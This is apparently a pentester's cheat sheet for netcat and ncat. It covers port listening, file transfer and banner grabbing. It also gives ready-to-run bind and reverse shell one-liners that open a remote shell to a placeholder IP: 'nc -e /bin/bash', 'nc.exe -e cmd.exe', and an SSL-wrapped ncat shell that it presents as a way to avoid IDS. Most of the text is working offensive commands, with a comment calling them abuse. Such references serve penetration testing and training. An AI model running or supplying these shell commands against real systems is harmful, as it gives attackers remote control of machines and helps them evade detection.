Netcat

  • Netcat allows you to basically read and write TCP and UDP Packets.
  • Connect to a POP3 mail server:
nc -nv xxx.xxx.xxx.xxx 110
  • Listen on TCP/UDP port:
nc -nlvp 4444
  • Connect to a netcat (or other) port:
nc -nv xxx.xxx.xxx.xxx 4444
  • Send/transfer a file using netcat:
nc -nv xxx.xxx.xxx.xxx 4444 < /usr/share/windows-binaries/wget.exe
  • And vice versa, to receive a file using netcat:
nc -nlvp 4444 > wget.exe

NOTE: Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that:

whereis nc
nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
# You can still abuse it:
/bin/nc.traditional -e /bin/bash xxx.xxx.xxx.xxx 4444

Shells:

  • Create a bind shell with Ncat using cmd.exe on Windows:
nc.exe -nlvp 4444 -e cmd.exe
  • Create a reverse shell:
nc.exe -nv xxx.xxx.xxx.xxx 4444 -e cmd.exe
  • Create a reverse shell with Ncat using bash on Linux:
nc -nv xxx.xxx.xxx.xxx 4444 -e /bin/bash
  • Netcat for Banner Grabbing:
echo "" | nc -nv -w1  

Ncat (Netcat for the 21st Century)

  • Ncat is an updated netcat for the Nmap project which provides more security and is able to avoid IDS (e.g. via SSL). For more information, visit https://nmap.org/ncat/. A portable version of it exists and should be included in Kali.


  • Reverse shell from Windows using cmd.exe using SSL:
ncat --exec cmd.exe --allow xxx.xxx.xxx.xxx -vnl 4444 --ssl
  • Listen on port 4444 using SSL:
ncat -v xxx.xxx.xxx.xx 4444 --ssl